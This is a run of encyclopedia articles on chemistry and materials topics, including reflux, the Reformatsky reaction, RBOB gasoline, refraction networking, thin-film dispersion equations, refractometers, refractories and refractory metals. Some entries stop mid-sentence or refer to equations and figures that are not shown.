A mixture of reactants and solvent is placed in a suitable vessel, such as a round bottom flask . This vessel is connected to a water-cooled condenser , which is typically open to the atmosphere at the top. The reaction vessel is heated in order to boil the reaction mixture; vapours produced from the mixture are condensed by the condenser, and return to the vessel through gravity. The purpose is to thermally accelerate the reaction by conducting it at an elevated, controlled temperature (i.e. the solvent 's boiling point ) and ambient pressure without losing large quantities of the mixture. [ 6 ]
The diagram shows a typical reflux apparatus. It includes a water bath to indirectly heat the mixture. As many solvents used are flammable , direct heating with a Bunsen burner is not generally suitable, and alternatives such as a water bath, oil bath , sand bath , electric hot plate or heating mantle are employed. [ 6 ]
The apparatus shown in the diagram represents a batch distillation as opposed to a continuous distillation . The liquid feed mixture to be distilled is placed into the round-bottomed flask along with a few anti-bumping granules , and the fractionating column is fitted into the top. As the mixture is heated and boils, vapor rises up the column. The vapor condenses on the glass platforms (known as plates or trays) inside the column and runs back down into the liquid below, thereby refluxing the upflowing distillate vapor. The hottest tray is at the bottom of the column and the coolest tray is at the top. At steady state conditions, the vapor and liquid on each tray is at equilibrium . Only the most volatile of the vapors stays in gaseous form all the way to the top. The vapor at the top of the column then passes into the condenser , where it cools until it condenses into a liquid. The separation can be enhanced with the addition of more trays (to a practical limitation of heat, flow, etc.). The process continues until all the most volatile components in the liquid feed boil out of the mixture. This point can be recognized by the rise in temperature shown on the thermometer. For continuous distillation , the feed mixture enters in the middle of the column.
By controlling the temperature of the condenser, often called a dephlegmator, a reflux still may be used to ensure that higher boiling point components are returned to the flask while lighter elements are passed out to a secondary condenser. This is useful in producing high quality alcoholic beverages , while ensuring that less desirable components (such as fusel alcohols ) are returned to the primary flask. For high quality neutral spirits (such as vodka ), or post distillation flavored spirits (gin, absinthe), a process of multiple distillations or charcoal filtering may be applied to obtain a product lacking in any suggestion of its original source material for fermentation . The geometry of the still also plays a role in determining how much reflux occurs. In a pot still , if the tube leading from the boiler to the condenser, the lyne arm , is angled upward, more liquid will have a chance to condense and flow back into the boiler leading to increased reflux. Typical results can increase production as high as 50% over the basic worm type condenser. The addition of a copper "boiling ball" in the path creates an area where expansion of gasses into the ball causes cooling and subsequent condensation and reflux. In a column still , the addition of inert materials in the column (e.g., packing) creates surfaces for early condensation and leads to increased reflux. [ citation needed ] | https://en.wikipedia.org/wiki/Reflux |
The Reformatsky reaction (sometimes transliterated as Reformatskii reaction ) is an organic reaction which condenses aldehydes or ketones with α-halo esters using metallic zinc to form β-hydroxy-esters: [ 1 ] [ 2 ]
The organozinc reagent, also called a 'Reformatsky enolate', is prepared by treating an alpha-halo ester with zinc dust. Reformatsky enolates are less reactive than lithium enolates or Grignard reagents and hence nucleophilic addition to the ester group does not occur. The reaction was discovered by Sergey Nikolaevich Reformatsky .
Some reviews have been published. [ 3 ] [ 4 ]
In addition [ 5 ] to aldehydes and ketones, it has also been shown that the Reformatsky enolate is able to react with acid chlorides , [ 6 ] imines , [ 7 ] nitriles (see Blaise reaction ), and nitrones . [ 8 ] Moreover, [ 5 ] metals other than zinc have also been used, including magnesium , [ 9 ] iron , [ 10 ] cobalt , [ 11 ] nickel , [ 12 ] germanium , [ 13 ] cadmium , [ 14 ] indium , [ 15 ] [ 16 ] barium , [ 17 ] and cerium . [ 18 ] Additionally, [ 5 ] metal salts are also applicable in place of metals, notably samarium(II) iodide , [ 19 ] [ 20 ] chromium(II) chloride , [ 21 ] titanium(II) chloride , [ 22 ] cerium(III) halides such as cerium(III) iodide , [ 23 ] and titanocene(III) chloride . [ 24 ]
The crystal structures of the THF complexes of the Reformatsky reagents tert -butyl bromozincacetate [ 25 ] and ethyl bromozincacetate [ 26 ] have been determined. Both form cyclic eight-membered dimers in the solid state, but differ in stereochemistry: the eight-membered ring in the ethyl derivative adopts a tub-shaped conformation and has cis bromo groups and cis THF ligands, whereas in the tert -butyl derivative, the ring is in a chair form and the bromo groups and THF ligands are trans . Note that, in contrast to lithium and boron enolates, which have the metal(loid)s exclusively bond to oxygen, the zinc enolate moiety in the Reformatsky reagents have zinc atoms that are simultaneously O- and C-bound and can therefore be described as " organometallic ".
Zinc metal is inserted into the carbon-halogen bond of the α-haloester by oxidative addition 1 . This compound dimerizes and rearranges to form two zinc enolates 2 . The oxygen on an aldehyde or ketone coordinates to the zinc to form the six-member chair like transition state 3 . A rearrangement occurs in which zinc switches to the aldehyde or ketone oxygen and a carbon-carbon bond is formed 4 . Acid workup 5 , 6 removes zinc to yield zinc(II) salts and a β-hydroxy-ester 7 . [ 5 ]
In one variation of the Reformatsky reaction [ 27 ] an iodolactam is coupled with an aldehyde with triethylborane in toluene at −78 °C. | https://en.wikipedia.org/wiki/Reformatsky_reaction |
Reformulated Blendstock for Oxygenate Blending ( RBOB ) is a gasoline futures contract traded on the New York Mercantile Exchange (NYMEX). It is the benchmark futures contract for wholesale gasoline in the United States. [ 1 ]
Edwin Drake was the first to discover RBOB gasoline but discarded it as a byproduct on his quest to refine crude oil into kerosene . [ citation needed ]
RBOB gasoline is a blend of hydrocarbons suitable for use in Spark-ignition engines . It typically contains various additives, including oxygenates like ethanol or methyl tertiary butyl ether (MTBE), to improve octane rating and reduce air pollution. [ 2 ]
RBOB is refined from crude oil and about half of the crude oil is refined into RBOB gasoline, therefore RBOB tracks the price of WTI crude closely. [ 3 ] | https://en.wikipedia.org/wiki/Reformulated_Blendstock_for_Oxygenate_Blending |
Refraction networking , also known as decoy routing , is a research anti-censorship approach that would allow users to circumvent a censor without using any individual proxy servers. [ 1 ] Instead, it implements proxy functionality at the core of partner networks, such as those of Internet service providers , outside the censored country. These networks would discreetly provide censorship circumvention for "any connection that passes through their networks." [ 2 ] This prevents censors from selectively blocking proxy servers and makes censorship more expensive, in a strategy similar to collateral freedom . [ 3 ] [ 4 ] [ 5 ]
The approach was independently invented by teams at the University of Michigan , the University of Illinois , and Raytheon BBN Technologies . There are five existing protocols: Telex , [ 6 ] TapDance, [ 7 ] Cirripede, [ 8 ] Curveball, [ 9 ] and Rebound. [ 10 ] These teams are now working together to develop and deploy refraction networking with support from the U.S. Department of State . [ 1 ] [ 3 ]
This Internet-related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Refraction_networking |
A. R. Forouhi and I. Bloomer deduced dispersion equations for the refractive index, n , and extinction coefficient, k , which were published in 1986 [ 1 ] and 1988. [ 2 ] The 1986 publication relates to amorphous materials, while the 1988 publication relates to crystalline. Subsequently, in 1991, their work was included as a chapter in The Handbook of Optical Constants . [ 3 ] The Forouhi–Bloomer dispersion equations describe how photons of varying energies interact with thin films. When used with a spectroscopic reflectometry tool, the Forouhi–Bloomer dispersion equations specify n and k for amorphous and crystalline materials as a function of photon energy E . Values of n and k as a function of photon energy, E , are referred to as the spectra of n and k , which can also be expressed as functions of the wavelength of light, λ , since E = hc / λ . The symbol h is the Planck constant and c , the speed of light in vacuum. Together, n and k are often referred to as the "optical constants" of a material (though they are not constants since their values depend on photon energy).
The derivation of the Forouhi–Bloomer dispersion equations is based on obtaining an expression for k as a function of photon energy, symbolically written as k ( E ), starting from first principles quantum mechanics and solid state physics. An expression for n as a function of photon energy, symbolically written as n ( E ), is then determined from the expression for k ( E ) in accordance to the Kramers–Kronig relations [ 4 ] which states that n ( E ) is the Hilbert transform of k ( E ).
The Forouhi–Bloomer dispersion equations for n ( E ) and k ( E ) of amorphous materials are given as:
The five parameters A , B , C , E g , and n (∞) each have physical significance. [ 1 ] [ 3 ] E g is the optical energy band gap of the material. A , B , and C depend on the band structure of the material. They are positive constants such that 4 C − B 2 > 0. Finally, n (∞), a constant greater than unity, represents the value of n at E = ∞. The parameters B 0 and C 0 in the equation for n ( E ) are not independent parameters, but depend on A , B , C , and E g . They are given by:
where
Thus, for amorphous materials, a total of five parameters are sufficient to fully describe the dependence of both n and k on photon energy, E .
For crystalline materials which have multiple peaks in their n and k spectra, the Forouhi–Bloomer dispersion equations can be extended as follows:
The number of terms in each sum, q , is equal to the number of peaks in the n and k spectra of the material. Every term in the sum has its own values of the parameters A , B , C , E g , as well as its own values of B 0 and C 0 . Analogous to the amorphous case, the terms all have physical significance. [ 2 ] [ 3 ]
The refractive index ( n ) and extinction coefficient ( k ) are related to the interaction between a material and incident light, and are associated with refraction and absorption (respectively). They can be considered as the "fingerprint of the material". Thin film material coatings on various substrates provide important functionalities for the microfabrication industry , and the n , k , as well as the thickness, t , of these thin film constituents must be measured and controlled to allow for repeatable manufacturing .
The Forouhi–Bloomer dispersion equations for n and k were originally expected to apply to semiconductors and dielectrics, whether in amorphous, polycrystalline, or crystalline states. However, they have been shown to describe the n and k spectra of transparent conductors, [ 5 ] as well as metallic compounds. [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] The formalism for crystalline materials was found to also apply to polymers, [ 16 ] [ 17 ] [ 18 ] which consist of long chains of molecules that do not form a crystallographic structure in the classical sense.
Other dispersion models that can be used to derive n and k , such as the Tauc–Lorentz model , can be found in the literature. [ 19 ] [ 20 ] Two well-known models— Cauchy and Sellmeier —provide empirical expressions for n valid over a limited measurement range, and are only useful for non-absorbing films where k =0. Consequently, the Forouhi–Bloomer formulation has been used for measuring thin films in various applications. [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ]
In the following discussions, all variables of photon energy, E , will be described in terms of wavelength of light, λ , since experimentally variables involving thin films are typically measured over a spectrum of wavelengths. The n and k spectra of a thin film cannot be measured directly, but must be determined indirectly from measurable quantities that depend on them. Spectroscopic reflectance, R ( λ ), is one such measurable quantity. Another, is spectroscopic transmittance, T ( λ ), applicable when the substrate is transparent. Spectroscopic reflectance of a thin film on a substrate represents the ratio of the intensity of light reflected from the sample to the intensity of incident light, measured over a range of wavelengths, whereas spectroscopic transmittance, T ( λ ), represents the ratio of the intensity of light transmitted through the sample to the intensity of incident light, measured over a range of wavelengths; typically, there will also be a reflected signal, R ( λ ), accompanying T ( λ ).
The measurable quantities, R ( λ ) and T ( λ ) depend not only on n ( λ ) and k ( λ ) of the film, but also on film thickness, t , and n ( λ ) and k ( λ ) of the substrate. For a silicon substrate, the n ( λ ) and k ( λ ) values are known and are taken as a given input. The challenge of characterizing thin films involves extracting t , n ( λ ) and k ( λ ) of the film from the measurement of R ( λ ) and/or T ( λ ). This can be achieved by combining the Forouhi–Bloomer dispersion equations for n ( λ ) and k ( λ ) with the Fresnel equations for the reflection and transmission of light at an interface [ 21 ] to obtain theoretical, physically valid, expressions for reflectance and transmittance. In so doing, the challenge is reduced to extracting the five parameters A , B , C , E g , and n (∞) that constitute n ( λ ) and k ( λ ), along with film thickness, t , by using a nonlinear least squares regression analysis [ 22 ] [ 23 ] fitting procedure. The fitting procedure entails an iterative improvement of the values of A , B , C , E g , n (∞), t , in order to reduce the sum of the squares of the errors between the theoretical R ( λ ) or theoretical T ( λ ) and the measured spectrum of R ( λ ) or T ( λ ).
Besides spectroscopic reflectance and transmittance, spectroscopic ellipsometry can also be used in an analogous way to characterize thin films and determine t , n ( λ ) and k ( λ ).
The following examples show the versatility of using the Forouhi–Bloomer dispersion equations to characterize thin films using a tool based on near-normal incident spectroscopic reflectance. Near-normal spectroscopic transmittance is also used when the substrate is transparent. The n ( λ ) and k ( λ ) spectra of each film are obtained along with film thickness, over a wide range of wavelengths from deep ultraviolet to near infrared wavelengths (190–1000 nm).
In the following examples, the notation for theoretical and measured reflectance in the spectral plots is expressed as "R-theor" and "R-meas", respectively.
Below are schematics depicting the thin film measurement process:
The Forouhi–Bloomer dispersion equations in combination with Rigorous Coupled-Wave Analysis (RCWA) have also been used to obtain detailed profile information (depth, CD, sidewall angle) of trench structures. In order to extract structure information, polarized broadband reflectance data, Rs and Rp , must be collected over a large wavelength range from a periodic structure (grating), and then analyzed with a model that incorporates Forouhi–Bloomer dispersion equations and RCWA. Inputs into the model include grating pitch and n and k spectra of all materials within the structure, while outputs can include Depth, CDs at multiple locations, and even sidewall angle. The n and k spectra of such materials can be obtained in accordance with the methodology described in this section for thin film measurements.
Below are schematics depicting the measurement process for trench structures. Examples of trench measurements then follow.
Example 1 shows one broad maximum in the n(λ) and k(λ) spectra of the a-Si film, as is expected for amorphous materials. As a material transitions toward crystallinity, the broad maximum gives way to several sharper peaks in its n(λ) and k(λ) spectra, as demonstrated in the graphics.
When the measurement involves two or more films in a stack of films, the theoretical expression for reflectance must be expanded to include the n ( λ ) and k ( λ ) spectra, plus thickness, t , of each film. However, the regression may not converge to unique values of the parameters, due to the non-linear nature of the expression for reflectance. So it is helpful to eliminate some of the unknowns. For example, the n ( λ ) and k ( λ ) spectra of one or more of the films may be known from the literature or previous measurements, and held fixed (not allowed to vary) during the regression. To obtain the results shown in Example 1, the n ( λ ) and k ( λ ) spectra of the SiO 2 layer was fixed, and the other parameters, n ( λ ) and k ( λ ) of a-Si, plus thicknesses of both a-Si and SiO 2 were allowed to vary.
Polymers such as photoresist consist of long chains of molecules which do not form a crystallographic structure in the classic sense. However, their n ( λ ) and k ( λ ) spectra exhibit several sharp peaks rather than a broad maximum expected for non-crystalline materials. Thus, the measurement results for a polymer are based on the Forouhi–Bloomer formulation for crystalline materials. Most of the structure in the n ( λ ) and k ( λ ) spectra occurs in the deep UV wavelength range and thus to properly characterize a film of this nature, it is necessary that the measured reflectance data in the deep UV range is accurate.
The figure shows a measurement example of a photoresist (polymer) material used for 248 nm micro-lithography. Six terms were used in the Forouhi–Bloomer equations for crystalline materials to fit the data and achieve the results.
Indium tin oxide (ITO) is a conducting material with the unusual property that it is transparent, so it is widely used in the flat panel display industry. Reflectance and transmittance measurements of the uncoated glass substrate were needed in order to determine the previously unknown n ( λ ) and k ( λ ) spectra of the glass. The reflectance and transmittance of ITO deposited on the same glass substrate were then measured simultaneously, and analyzed using the Forouhi–Bloomer equations.
As expected, the k ( λ ) spectrum of ITO is zero in the visible wavelength range, since ITO is transparent. The behavior of the k ( λ ) spectrum of ITO in the near-infrared (NIR) and infrared (IR) wavelength ranges resembles that of a metal: non-zero in the NIR range of 750–1000 nm (difficult to discern in the graphics since its values are very small) and reaching a maximum value in the IR range ( λ > 1000 nm). The average k value of the ITO film in the NIR and IR range is 0.05.
When dealing with complex films, in some instances the parameters cannot be resolved uniquely. To constrain the solution to a set of unique values, a technique involving multi-spectral analysis can be used. In the simplest case, this entails depositing the film on two different substrates and then simultaneously analyzing the results using the Forouhi–Bloomer dispersion equations.
For example, the single measurement of reflectance in 190–1000 nm range of Ge 40 Se 60 /Si does not provide unique n ( λ ) and k ( λ ) spectra of the film. However, this problem can be solved by depositing the same Ge 40 Se 60 film on another substrate, in this case oxidized silicon, and then simultaneously analyzing the measured reflectance data to determine:
The trench structure depicted in the adjacent diagram repeats itself in 160 nm intervals, that is, it has a given pitch of 160 nm. The trench is composed of the following materials:
Accurate n and k values of these materials are necessary in order to analyze the structure. Often a blanket area on the trench sample with the film of interest is present for the measurement. In this example, the reflectance spectrum of the poly-silicon was measured on a blanket area containing the poly-silicon, from which its n and k spectra were determined in accordance with the methodology described in this article that uses the Forouhi–Bloomer dispersion equations. Fixed tables of n and k values were used for the SiO 2 and Si 3 N 4 films.
Combining the n and k spectra of the films with Rigorous Coupled-Wave Analysis (RCWA) the following critical parameters were determined (with measured results as well): | https://en.wikipedia.org/wiki/Refractive_index_and_extinction_coefficient_of_thin_film_materials |
A refractometer is a laboratory or field device for the measurement of an index of refraction ( refractometry ). The index of refraction is calculated from the observed refraction angle using Snell's law . For mixtures, the index of refraction then allows the concentration to be determined using mixing rules such as the Gladstone–Dale relation and Lorentz–Lorenz equation .
Standard refractometers measure the extent of light refraction (as part of a refractive index) of transparent substances in either a liquid this is then used in order to identify a liquid sample, analyze the sample's purity, and determine the amount or concentration of dissolved substances within the sample. As light passes through the liquid from the air it will slow down and create a ‘bending’ illusion, the severity of the ‘bend’ will depend on the amount of substance dissolved in the liquid. For example, the amount of sugar in a glass of water. [ 1 ]
There are four main types of refractometers: traditional handheld refractometers , digital handheld refractometers , laboratory or Abbe refractometers (named for the instrument's inventor and based on Ernst Abbe's original design of the 'critical angle') and inline process refractometers . [ 2 ] There is also the Rayleigh Refractometer used (typically) for measuring the refractive indices of gases.
In laboratory medicine , a refractometer is used to measure the total plasma protein in a blood sample and urine specific gravity in a urine sample.
In drug diagnostics , a refractometer is used to measure the specific gravity of human urine.
In gemology , the gemstone refractometer is one of the fundamental pieces of equipment used in a gemological laboratory. Gemstones are transparent minerals and can therefore be examined using optical methods. Refractive index is a material constant, dependent on the chemical composition of a substance. The refractometer is used to help identify gem materials by measuring their refractive index, one of the principal properties used in determining the type of a gemstone. Due to the dependence of the refractive index on the wavelength of the light used ( i.e. dispersion ), the measurement is normally taken at the wavelength of the sodium line D-line (Na D ) of ~589 nm. This is either filtered out from daylight or generated with a monochromatic light-emitting diode ( LED ). Certain stones such as rubies, sapphires, tourmalines and topaz are optically anisotropic . They demonstrate birefringence based on the polarisation plane of the light. The two different refractive indexes are classified using a polarisation filter. Gemstone refractometers are available both as classic optical instruments and as electronic measurement devices with a digital display . [ 3 ]
In marine aquarium keeping, a refractometer is used to measure the salinity and specific gravity of the water.
In the automobile industry , a refractometer is used to measure the coolant concentration.
In the machine industry , a refractometer is used to measure the amount of coolant concentrate that has been added to the water-based coolant for the machining process.
In homebrewing , a brewing refractometer is used to measure the specific gravity before fermentation to determine the amount of fermentable sugars which will potentially be converted to alcohol.
Brix refractometers are often used by hobbyists for making preserves including jams, marmalades and honey. In beekeeping , a brix refractometer is used to measure the amount of water in honey.
Automatic refractometers automatically measure the refractive index of a sample. The automatic measurement of the refractive index of the sample is based on the determination of the critical angle of total reflection.
A light source, usually a long-life LED, is focused onto a prism surface via a lens system. An interference filter guarantees the specified wavelength. Due to focusing light to a spot at the prism surface, a wide range of different angles is covered.
As shown in the figure "Schematic setup of an automatic refractometer" the measured sample is in direct contact with the measuring prism. Depending on its refractive index, the incoming light below the critical angle of total reflection is partly transmitted into the sample, whereas for higher angles of incidence the light is totally reflected. This dependence of the reflected light intensity from the incident angle is measured with a high-resolution sensor array . From the video signal taken with the CCD sensor the refractive index of the sample can be calculated.
This method of detecting the angle of total reflection is independent on the sample properties. It is even possible to measure the refractive index of optically dense strongly absorbing samples or samples containing air bubbles or solid particles . Furthermore, only a few microliters are required and the sample can be recovered. This determination of the refraction angle is independent of vibrations and other environmental disturbances.
The refractive index of a given sample varies with wavelength for all materials. This dispersion relation is nonlinear and is characteristic for every material. In the visible range, a decrease of the refractive index comes with increasing wavelength. In glass prisms very little absorption is observable. In the infrared wavelength range several absorption maxima and fluctuations in the refractive index appear. To guarantee a high quality measurement with an accuracy of up to 0.00002 in the refractive index the wavelength has to be determined correctly. Therefore, in modern refractometers the wavelength is tuned to a bandwidth of +/-0.2 nm to ensure correct results for samples with different dispersions.
Temperature has a very important influence on the refractive index measurement. Therefore, the temperature of the prism and the temperature of the sample have to be controlled with high precision. There are several subtly-different designs for controlling the temperature; but there are some key factors common to all, such as high-precision temperature sensors and Peltier devices to control the temperature of the sample and the prism. The temperature control of these devices should be designed so that the variation in sample temperature is small enough that it will not cause a detectable refractive-index change.
External water baths were used in the past but are no longer needed.
Automatic refractometers are microprocessor-controlled electronic devices. This means they can have a high degree of automation and also be combined with other measuring devices
There are different types of sample cells available, ranging from a flow cell for a few microliters to sample cells with a filling funnel for fast sample exchange without cleaning the measuring prism in between. The sample cells can also be used for the measurement of poisonous and toxic samples with minimum exposure to the sample.
Micro cells require only a few microliters volume, assure good recovery of expensive samples and prevent evaporation of volatile samples or solvents. They can also be used in automated systems for automatic filling of the sample onto the refractometer prism.
For convenient filling of the sample through a funnel, flow cells with a filling funnel are available. These are used for fast sample exchange in quality control applications.
Once an automatic refractometer is equipped with a flow cell, the sample can either be filled by means of a syringe or by using a peristaltic pump. Modern refractometers have the option of a built-in peristaltic pump. This is controlled via the instrument's software menu. A peristaltic pump opens the way to monitor batch processes in the laboratory or perform multiple measurements on one sample without any user interaction. This eliminates human error and assures a high sample throughput.
If an automated measurement of a large number of samples is required, modern automatic refractometers can be combined with an automatic sample changer. The sample changer is controlled by the refractometer and assures fully automated measurements of the samples placed in the vials of the sample changer for measurements.
Today's laboratories do not only want to measure the refractive index of samples, but several additional parameters like density or viscosity to perform efficient quality control. Due to the microprocessor control and a number of interfaces, automatic refractometers are able to communicate with computers or other measuring devices, e.g. density meters, pH meters or viscosity meters, to store refractive index data and density data (and other parameters) into one database.
Automatic refractometers do not only measure the refractive index, but offer a lot of additional software features, like
Refractometers are often used in pharmaceutical applications for quality control of raw intermediate and final products. The manufacturers of pharmaceuticals have to follow several international regulations like FDA 21 CFR Part 11, GMP, Gamp 5, USP<1058>, which require a lot of documentation work. The manufacturers of automatic refractometers support these users providing instrument software fulfills the requirements of 21 CFR Part 11, with user levels, electronic signature and audit trail. Furthermore, Pharma Validation and Qualification Packages are available containing | https://en.wikipedia.org/wiki/Refractometer |
In materials science , a refractory (or refractory material ) is a material that is resistant to decomposition by heat or chemical attack and that retains its strength and rigidity at high temperatures . [ 1 ] They are inorganic , non-metallic compounds that may be porous or non-porous, and their crystallinity varies widely: they may be crystalline , polycrystalline , amorphous , or composite . They are typically composed of oxides , carbides or nitrides of the following elements: silicon , aluminium , magnesium , calcium , boron , chromium and zirconium . [ 2 ] Many refractories are ceramics , but some such as graphite are not, and some ceramics such as clay pottery are not considered refractory. Refractories are distinguished from the refractory metals , which are elemental metals and their alloys that have high melting temperatures.
Refractories are defined by ASTM C71 as "non-metallic materials having those chemical and physical properties that make them applicable for structures, or as components of systems, that are exposed to environments above 1,000 °F (811 K; 538 °C)". [ 3 ] Refractory materials are used in furnaces , kilns , incinerators , and reactors . Refractories are also used to make crucibles and molds for casting glass and metals. The iron and steel industry and metal casting sectors use approximately 70% of all refractories produced. [ 4 ]
Refractory materials must be chemically and physically stable at high temperatures. Depending on the operating environment, they must be resistant to thermal shock , be chemically inert , and/or have specific ranges of thermal conductivity and of the coefficient of thermal expansion .
The oxides of aluminium ( alumina ), silicon ( silica ) and magnesium ( magnesia ) are the most important materials used in the manufacturing of refractories. Another oxide usually found in refractories is the oxide of calcium ( lime ). [ 5 ] Fire clays are also widely used in the manufacture of refractories.
Refractories must be chosen according to the conditions they face. Some applications require special refractory materials. [ 6 ] Zirconia is used when the material must withstand extremely high temperatures. [ 7 ] Silicon carbide and carbon ( graphite ) are two other refractory materials used in some very severe temperature conditions, but they cannot be used in contact with oxygen , as they would oxidize and burn.
Binary compounds such as tungsten carbide or boron nitride can be very refractory. Hafnium carbide is the most refractory binary compound known, with a melting point of 3890 °C. [ 8 ] [ 9 ] The ternary compound tantalum hafnium carbide has one of the highest melting points of all known compounds (4215 °C). [ 10 ] [ 11 ]
Molybdenum disilicide has a high melting point of 2030 °C and is often used as a heating element .
Refractory materials are useful for the following functions: [ 12 ] [ 2 ]
Refractories have multiple useful applications. In the metallurgy industry, refractories are used for lining furnaces, kilns, reactors, and other vessels which hold and transport hot media such as metal and slag . Refractories have other high temperature applications such as fired heaters, hydrogen reformers, ammonia primary and secondary reformers, cracking furnaces, utility boilers, catalytic cracking units, air heaters, and sulfur furnaces. [ 12 ] They are used for surfacing flame deflectors in rocket launch structures. [ 13 ]
Refractories are classified in multiple ways, based on:
Acidic refractories are generally impervious to acidic materials but easily attacked by basic materials, and are thus used with acidic slag in acidic environments. They include substances such as silica , alumina , and fire clay brick refractories. Notable reagents that can attack both alumina and silica are hydrofluoric acid, phosphoric acid, and fluorinated gases (e.g. HF, F 2 ). [ 14 ] At high temperatures, acidic refractories may also react with limes and basic oxides.
Basic refractories are used in areas where slags and atmosphere are basic. They are stable to alkaline materials but can react to acids, which is important e. g. when removing phosphorus from pig iron (see Gilchrist–Thomas process ). The main raw materials belong to the RO group, of which magnesia (MgO) is a common example. Other examples include dolomite and chrome-magnesia. For the first half of the twentieth century, the steel making process used artificial periclase (roasted magnesite ) as a furnace lining material.
These are used in areas where slags and atmosphere are either acidic or basic and are chemically stable to both acids and bases. The main raw materials belong to, but are not confined to, the R 2 O 3 group. Common examples of these materials are alumina (Al 2 O 3 ), chromia (Cr 2 O 3 ) and carbon. [ 2 ]
Refractory objects are manufactured in standard shapes and special shapes. Standard shapes have dimensions that conform to conventions used by refractory manufacturers and are generally applicable to kilns or furnaces of the same types. Standard shapes are usually bricks that have a standard dimension of 9 in × 4.5 in × 2.5 in (229 mm × 114 mm × 64 mm) and this dimension is called a "one brick equivalent". "Brick equivalents" are used in estimating how many refractory bricks it takes to make an installation into an industrial furnace. There are ranges of standard shapes of different sizes manufactured to produce walls, roofs, arches, tubes and circular apertures etc. Special shapes are specifically made for specific locations within furnaces and for particular kilns or furnaces. Special shapes are usually less dense and therefore less hard wearing than standard shapes.
These are without prescribed form and are only given shape upon application. These types are known as monolithic refractories. Common examples include plastic masses, ramming masses , castables, gunning masses, fettling mix, and mortars.
Dry vibration linings often used in induction furnace linings are also monolithic, and sold and transported as a dry powder, usually with a magnesia/alumina composition with additions of other chemicals for altering specific properties. They are also finding more applications in blast furnace linings, although this use is still rare.
Refractory materials are classified into three types based on fusion temperature (melting point).
Refractoriness is the property of a refractory's multiphase to reach a specific softening degree at high temperature without load, and is measured with a pyrometric cone equivalent (PCE) test. Refractories are classified as: [ 2 ]
Refractories may be classified by thermal conductivity as either conducting, nonconducting, or insulating. Examples of conducting refractories are silicon carbide (SiC) and zirconium carbide (ZrC), whereas examples of nonconducting refractories are silica and alumina. Insulating refractories include calcium silicate materials, kaolin , and zirconia.
Insulating refractories are used to reduce the rate of heat loss through furnace walls. These refractories have low thermal conductivity due to a high degree of porosity, with a desired porous structure of small, uniform pores evenly distributed throughout the refractory brick in order to minimize thermal conductivity. Insulating refractories can be further classified into four types: [ 2 ] | https://en.wikipedia.org/wiki/Refractory |
In planetary science , any material that has a relatively high equilibrium condensation temperature is called refractory . [ 1 ] The opposite of refractory is volatile .
The refractory group includes elements and compounds like metals and silicates (commonly termed rocks) which make up the bulk of the mass of the terrestrial planets and asteroids in the inner belt. A fraction of the mass of other asteroids , giant planets, their moons and trans-Neptunian objects is also made of refractory materials. [ 2 ]
The elements can be divided into several categories:
[ 1 ]
The condensation temperatures are the temperatures at which 50% of the element will be in the form of a solid (rock) under a pressure of 10 −4 bar . However, slightly different groups and temperature ranges are used sometimes. Refractory material are also often divided into refractory lithophile elements and refractory siderophile elements . [ 3 ] | https://en.wikipedia.org/wiki/Refractory_(planetary_science) |
Refractory metals are a class of metals that are extraordinarily resistant to heat and wear . The expression is mostly used in the context of materials science , metallurgy and engineering . The definition of which elements belong to this group differs. The most common definition includes five elements: two of the fifth period ( niobium and molybdenum ) and three of the sixth period ( tantalum , tungsten , and rhenium ). They all share some properties, including a melting point above 2000 °C and high hardness at room temperature. They are chemically inert and have a relatively high density. Their high melting points make powder metallurgy the method of choice for fabricating components from these metals. Some of their applications include tools to work metals at high temperatures, wire filaments, casting molds, and chemical reaction vessels in corrosive environments. Partly due to the high melting point, refractory metals are stable against creep deformation to very high temperatures.
Most definitions of the term 'refractory metals' list the extraordinarily high melting point as a key requirement for inclusion. By one definition, a melting point above 4,000 °F (2,200 °C) is necessary to qualify, which includes iridium , osmium , niobium , molybdenum , tantalum , tungsten , rhenium , rhodium , ruthenium and hafnium . [ 2 ] The five elements niobium , molybdenum , tantalum , tungsten and rhenium are included in all definitions, [ 3 ] while the widest definition, including all elements with a melting point above 2,123 K (1,850 °C), such as titanium , vanadium , zirconium , and chromium . [ 4 ] Technetium is not included because of its radioactivity, though it would otherwise have qualified under the widest definition. [ 5 ]
Refractory metals have high melting points, with tungsten and rhenium the highest of all elements, and the other's melting points only exceeded by osmium and iridium , and the sublimation of carbon . These high melting points define most of their applications. All the metals are body-centered cubic except rhenium which is hexagonal close-packed . The physical properties of the refractory elements vary significantly because they are members of different groups of the periodic table . [ 6 ] [ 7 ] The hardness, high melting and boiling points, and high enthalpies of atomization of these metals arise from the partial occupation of the outer d subshell , allowing the d electrons to participate in metallic bonding. This gives stiff, highly stable bonds to neighboring atoms and a body-centered cubic crystal structure that resists deformation. Moving to the right in the periodic table, more d electrons increase this effect, but as the d subshell fills they are pulled by the higher nuclear charge into the atom's inert core , reducing their ability to delocalize to form bonds with neighbors. These opposing effects result in groups 5 through 7 exhibiting the most refractory properties. [ 8 ]
Creep resistance is a key property of the refractory metals. In metals, the starting of creep correlates with the melting point of the material; the creep in aluminium alloys starts at 200 °C, while for refractory metals temperatures above 1500 °C are necessary. This resistance against deformation at high temperatures makes the refractory metals suitable against strong forces at high temperature, for example in jet engines , or tools used during forging . [ 9 ] [ 10 ]
The refractory metals show a wide variety of chemical properties because they are members of three distinct groups in the periodic table . They are easily oxidized, but this reaction is slowed down in the bulk metal by the formation of stable oxide layers on the surface ( passivation ). Especially the oxide of rhenium is more volatile than the metal, and therefore at high temperature the stabilization against the attack of oxygen is lost, because the oxide layer evaporates. They all are relatively stable against acids. [ 6 ]
Refractory metals, and alloys made from them, are used in lighting , tools, lubricants , nuclear reaction control rods , as catalysts , and for their chemical or electrical properties. Because of their high melting point , refractory metal components are never fabricated by casting . The process of powder metallurgy is used. Powders of the pure metal are compacted, heated using electric current, and further fabricated by cold working with annealing steps. Refractory metals and their alloys can be worked into wire , ingots , rebars , sheets or foil .
